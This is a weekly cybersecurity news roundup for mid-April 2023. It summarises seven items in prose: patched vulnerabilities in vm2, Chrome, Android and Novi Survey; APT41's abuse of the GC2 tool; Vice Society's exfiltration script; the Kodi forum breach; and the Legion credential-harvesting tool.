04/13/2023-04/19/2023 Critical Flaws in vm2 JavaScript Library, APT41’s Use of Open Source GC2 Tool, Kodi Confirms Data Breach And More

1. Critical Flaws in vm2 JavaScript Library Can Lead to Remote Code Execution 

A fresh round of patches has been made available for the vm2 JavaScript library to address two critical flaws that could be exploited to break out of the sandbox protections.Both the flaws – CVE-2023-29199 and CVE-2023-30547 – are rated 9.8 out of 10 on the CVSS scoring system and have been addressed in versions 3.9.16 and 3.9.17, respectively. Successful exploitation of the bugs, which allow an attacker to raise an unsanitized host exception, could be weaponized to escape the sandbox and run arbitrary code in the host context.The disclosure comes a little over a week after vm2 remediated another sandbox escape flaw (CVE-2023-29017, CVSS score: 9.8) that could lead to the execution of arbitrary code on the underlying system.

2. Google Uncovers APT41’s Use of Open Source GC2 Tool to Target Media and Job Sites

A Chinese nation-state group targeted an unnamed Taiwanese media organization to deliver an open source red teaming tool known as Google Command and Control (GC2) amid broader abuse of Google’s infrastructure for malicious ends. The tech giant’s Threat Analysis Group (TAG) attributed the campaign to a threat actor it tracks under the geological and geographical-themed moniker HOODOO. The starting point of the attack is a phishing email that contains links to a password-protected file hosted on Google Drive, which, in turn, incorporates the Go-based GC2 tool to read commands from Google Sheets and exfiltrate data using the cloud storage service. After installation on the victim machine, the malware queries Google Sheets to obtain attacker commands. In addition to exfiltration via Drive, GC2 enables the attacker to download additional files from Drive onto the victim system.

3. Google Releases Urgent Chrome Update to Fix Actively Exploited Zero-Day Vulnerability

Google on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year. Tracked as CVE-2023-2033, the high-severity vulnerability has been described as a type confusion issue in the V8 JavaScript engine. Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. The tech giant acknowledged that “an exploit for CVE-2023-2033 exists in the wild,” but stopped short of sharing additional technical specifics or indicators of compromise (IoCs) to prevent further exploitation by threat actors.

Recommendation
Users are recommended to upgrade to version 112.0.5615.121 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

4. Vice Society Ransomware Using Stealthy PowerShell Tool for Data Exfiltration

Threat actors associated with the Vice Society ransomware gang have been observed using a bespoke PowerShell-based tool to fly under the radar and automate the process of exfiltrating data from compromised networks. Threat actors (TAs) using built-in data exfiltration methods like [living off the land binaries and scripts] negate the need to bring in external tools that might be flagged by security software and/or human-based security detection mechanisms. These methods can also hide within the general operating environment, providing subversion to the threat actor. The PowerShell script discovered by Unit 42 (w1.ps1) works by identifying mounted drives on the system, and then recursively searching through each of the root directories to facilitate data exfiltration over HTTP. The tool also makes use of exclusion criteria to filter out system files, backups, and folders pointing to web browsers as well as security solutions from Symantec, ESET, and Sophos. The discovery of the data exfiltration script illustrates the ongoing threat of double extortion in the ransomware landscape. It also serves as a reminder for organizations to prioritize robust security protections and stay vigilant against evolving threats.

5. Kodi Confirms Data Breach: 400K User Records and Private Messages Stolen

Kodi, an open source media player software provider, has confirmed a data breach after a cyber attack. Threat actors stole user data and private messages from the company’s MyBB forum database, and attempted to sell the data dump to a cybercrime marketplace. They also created database backups, which were downloaded and deleted. The account used by the threat actors has been disabled, and Kodi has taken down its forum while commissioning a new server. The company emphasized that there is no evidence of unauthorized access to the server hosting the MyBB software. The breach affected 400,635 users, whose forum posts, messages, and personal information were compromised. Kodi plans to redeploy the forum on the latest version of the MyBB software.

6. New Python-Based “Legion” Hacking Tool Emerges on Telegram

Legion, a Python-based credential harvester and hacking tool, is being marketed on Telegram as a way for cybercriminals to break into various online services for further exploitation. The malware includes modules to exploit unpatched versions of Apache, conduct remote code execution attacks, and brute-force cPanel and WebHost Manager accounts. It is designed to exploit web servers running content management systems, PHP, or PHP-based frameworks like Laravel. The primary goal is to hijack the services and weaponize the infrastructure for follow-on attacks, including mass spam and opportunistic phishing campaigns. Legion also retrieves AWS credentials from insecure or misconfigured web servers and delivers SMS spam messages to users of US mobile networks. The origins of the threat actor remain unknown.

7. Severe Android and Novi Survey Vulnerabilities Under Active Exploitation

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities catalog due to active exploitation. The first vulnerability (CVE-2023-20963) is an Android Framework Privilege Escalation Vulnerability with a CVSS score of 7.8. Google has acknowledged that the vulnerability may be under limited, targeted exploitation. The second vulnerability (CVE-2023-29492) is an insecure deserialization vulnerability in Novi Survey software that allows attackers to execute code on the server remotely. The vulnerability was addressed by the software provider earlier this week. The development follows reports that Android apps from Chinese e-commerce company Pinduoduo were weaponized as a zero-day to steal data and control devices, exploiting the Android Framework Privilege Escalation Vulnerability. Google suspended Pinduoduo’s official app from the Play Store in March due to malware identified in off-Play versions of the software.